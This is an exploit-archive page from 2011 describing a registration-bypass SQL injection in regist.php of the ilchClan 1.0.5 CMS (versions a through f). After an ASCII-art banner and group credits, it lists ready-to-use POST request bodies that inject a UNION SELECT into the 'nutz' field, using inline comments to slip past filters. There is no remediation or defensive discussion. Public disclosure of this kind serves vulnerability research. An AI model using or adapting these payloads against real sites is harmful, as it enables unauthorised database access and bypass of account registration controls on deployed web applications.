ilchClan 1.0.5 (regist.php) SQL Injection Vulnerabiility

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ilchClan 1.0.5 (regist.php) SQL Injection Vulnerabiility
# Published : 2011-04-02
# Author :
# Previous Title : ZO Tech Multiple Print Servers Cross-site Scripting Vulnerability
# Next Title : PHPBoost 3.0 Remote Download Backup Vulnerability

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
/                                  _____ _      _                                        
                                  _    | ___| |__                                    /
/                                   / // |/ __| '_                                    
                                // /_ | | (__| | | |                                  /
/                                ____/ |_|___|_| |_|                                  
               Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php            /
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-                
                                         by
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/                                                                                        
 ___ ___ ___ ___                         _ _           _____           _         _     /
/| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_   
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|  /
/  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|    
                                              |___|                 |___|              /
/                                                                                       
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f! 
        Vulnerability Name : Registration Bypass SQL Injection Vulnerability 
                                 Date : 02.04.2011
                             SQL Injection method : $_POST   
                              Discovered by : Easy Laster
Security Group :Team-Internet,Undergroundagents,websec-empire.to and 4004-Security-Project.com
                               Greetings to free-hack.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                                      Security Flaws
                                 =-=-=-=-=-=-=-=-=-=-=-=
                                     ilch clan 1.0.5
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
                                     ilch clan 1.0.5a
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
                                     ilch clan 1.0.5b
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
                                     ilch clan 1.0.5c
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
                                     ilch clan 1.0.5d
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
                                     ilch clan 1.0.5e
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
                                     ilch clan 1.0.5f
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa